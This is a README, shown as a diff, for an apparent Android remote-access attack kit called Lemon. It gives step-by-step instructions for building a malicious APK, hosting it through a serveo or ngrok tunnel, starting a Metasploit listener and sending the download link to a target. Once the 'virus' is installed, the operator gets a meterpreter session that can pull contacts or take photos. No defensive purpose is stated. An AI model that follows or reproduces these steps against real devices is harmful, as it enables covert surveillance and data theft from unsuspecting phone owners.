LaioX/Lemon/README.md

 **How to use :-**

-1.Run php by typing "sh php"

-2.Run ssh by typing "sh ssh" and copy the link you get.
-[NEW SESSION]

-3.Forward TCP connections by typing "sh payload", type a name for your payload followed by ".apk" at the end, then choose a port of your own and choose a forwarding service, specify if you already have Ngrok or not, serveo requires no installation.
-It will take a little time to create and upload the payload with the specified port and name.

-4.Type "sh Handler" and read the info carefully.
-Now wait for the Handler to start, then type "set LHOST xxxx" and "set LPORT xxxx".
-Put the correct port and host according to the instructions, and finally type "run"   [NEW SESSION]

-5.Now, put your payload's name after the link that you got after running "sh ssh" [For Example : lente.serveo.net/Name.apk] and send the link to the target Android, once the virus gets installed in the target device, you will see a meterpreter session opening, wait for a few seconds.
-  Type "?" and press enter.
-Now you can mess with the Android device using the commnands listed.
+1. Start the script by executing 'python attack.py'

+2. Once the script completes, copy the link you got under "Forwarding HTTP port.." and your payload's name after it, for example : https://lente.serveo.net/lemon.apk, this link downloads the malicious apk when opened.

+3.Open up a new session, and type "msfconsole -r automate.rc", this should start metasploit and provide it necessary options.
+Once it stops, type "run" and press enter, this will start the listener.

+4. When the target installs and open the apk using your link, you will get a meterpreter session in your listener.

+5. Bow you can type 'help' for a list of options, example extract contacts, snap a picture etc.